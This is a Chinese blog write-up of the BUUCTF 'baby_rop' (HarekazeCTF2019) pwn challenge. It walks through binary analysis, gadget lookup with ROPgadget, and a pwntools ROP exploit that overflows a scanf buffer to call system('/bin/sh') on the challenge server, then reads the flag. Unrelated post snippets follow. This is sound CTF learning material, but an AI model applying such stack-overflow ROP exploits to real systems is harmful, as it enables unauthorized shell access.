buuctf pwn14

已于 2023-11-02 19:29:39 修改
阅读量62 收藏
点赞数
文章标签: 网络安全
于 2023-11-01 19:36:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74861133/article/details/134168101
版权

[HarekazeCTF2019]baby_rop 1

1.checksec

在这里插入图片描述

2.ida

在这里插入图片描述
溢出点在 __isoc99_scanf(“%s”, v4);处。
shif+f12找到bin/sh
在这里插入图片描述
但只有bin/sh的字符串
在这里插入图片描述
要想触发后门函数必须要调用system函数,故找到call system的指令的地址
在这里插入图片描述
使用命令ROPgadget --binary pwn14 --only 'pop|ret’找到pop rdi指令的地址
在这里插入图片描述
故exp如下:

from pwn import*
p=remote('node4.buuoj.cn',26818)
payload=b'a'*24+p64(0x400683)+p64(0x601048)+p64(0x4005E3)
p.sendlineafter("What's your name? ",payload)
p.interactive()

但拿到控制权后不能直接cat flag
首先需要使用命令find -name flag找到flag所在文件的位置./home/babyrop/flag
在这里插入图片描述
然后cd ./home/babyrop,再cat flag
在这里插入图片描述

曾经满眼皆是她
关注
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2640
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2144
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
buuctf pwn解题
2301_80477504的博客
02-01 562
1.
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 5321
BUU CTF PWN 入门知识详解
BUUCTF PWN(2)
qq_60794823的博客
09-28 256
首先先用checksec查看开启了什么保护可以看到只开启了NX保护,即堆栈不可执行用32位的IDA打开附件,shift+f12查看字串打开main函数查看vuln函数,发现存在栈溢出漏洞的函数,**fgets(s, 32, edata)**这里对gets作出了限制,32(0x20)而s的大小0x3c>0x20所以不能造成溢出。这道题就不能解决了吗,结果肯定不是这样的仔细查看C代码可以发现,函数实现了字符串替换,将I替换为you,并将结果重组赋值给s。
BUUCTF Pwn pwn1_sctf_2016
MrTreebook的博客
12-05 1339
BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 运行一下看看 3.IDA分析 看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
BUUCTF pwn
L0g1c的博客
01-30 1717
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件。 第三步:里有个 flag文件 使用 cat命令进行查看。 得到flag
buuctf pwn1_sctf_20161
m0_74125780的博客
08-26 142
然后又发现有个fgets函数,但是它限制只有32个字节,双击s查看s的长度,0x3c,有60个字符长度,但是只能输入32个字符所以无法造成栈溢出。但观察函数的内容,并nc一下,发现I可以替换成you。所以输入20个I就刚好满足60长度,再加上4。首先用checksec检查,发现是32位的,所以用32位的ida打开。速度找到system函数,查看它的地址,记下来,0x8048F0D。最后编写脚本,运行得到flag。
buuctf pwn入门1
weixin_63231007的博客
07-07 1470
buuctf pwn 前几道简单栈溢出&格式化字符串漏洞
BUUCTF PWN(1)
qq_60794823的博客
09-27 1056
首先checksec起手发现没有打开任何防护,是64位amd文件,使用IDA反汇编瞅一瞅首先shift+f12查看字串发现/bin/sh和system跟进查看/bin/sh的返回地址查看main函数的反编译代码发现**gets(s, argv)**栈溢出漏洞,没有限制s的输入大小点开s查看s的内存大小发现距离返回地址为0XF+0X8构造payload:‘a’ * 0x23 + p64(0x401186)发现连接超时。
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF pwn rip
weixin_55190422的博客
11-03 367
现在开始是记录我个人对BUU上PWN题的刷题记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8538
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Java核心技术.卷2.高级特性.原书第12版.中文
11-08
Java核心技术.卷2.高级特性.原书第12版.中文
【java毕业设计】springboot共享经济背景下校园闲置物品交易平台(springboot+mysql+说明文档).zip
11-08
项目经过测试均可完美运行! 环境说明: 开发语言:java 框架:ssm jdk版本:jdk1.8 数据库:mysql 5.7+ 数据库工具:Navicat11+ 管理工具:maven 开发工具:idea/eclipse 部署容器:tomcat7+
anscombe.csv
最新发布
11-08
anscombe
大模型备案推进,AI生成内容商业化进程加快
11-08
内容概要:文章介绍了自2023年8月以来中国AIGC领域的最新动态和发展趋势,强调了百度、商汤等公司在大模型方面的重要进展及备案工作的积极影响。具体而言,国家网信办发布的《生成式人工智能服务管理办法(征求意见稿)》标志着政策对大模型的规范化管理进入实施阶段,促进了AIGC从技术研发走向商业化应用的步伐。此外,报告还列出了多个上市公司的中期财报,展示它们在此转型期内的业绩变化情况。 适合人群:对AI及计算机视觉感兴趣的研究者、开发者以及企业管理人员。 使用场景及目标:适用于希望了解当前AIGC领域发展趋势和政策环境的机构和个人;旨在帮助投资者识别潜在投资机会。 其他说明:尽管许多公司取得了良好的进展,但也提醒关注供应链、政策支持及国内替代等风险因素。
基于Android ——MyDate 好看的日历,效果明显。.zip
11-08
内容概要:本资源聚焦 Android 编程实战,包含毕业设计示例、完整的 Android 项目源码及文档分享。采用 MVC 模式进行架构设计,结合 JSP 技术与 SQL Server 2000 数据库管理系统,实现高效的 Android 应用开发。 适用人群:Android 开发初学者、计算机专业学生进行毕业设计参考、希望提升 Android 开发技能的程序员。 实用场景及目标:适用于开发各类 Android 应用项目,帮助开发者快速构建稳定、功能丰富的应用程序,同时为毕业设计提供优质的模板和思路。 说明:资源提供了详细的代码注释和文档说明,方便学习者理解和上手,助力提升 Android 开发能力和项目实战经验。
大学心理咨询管理子系统 SSM毕业设计 附带论文.zip
11-08
大学心理咨询管理子系统 SSM毕业设计 附带论文 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值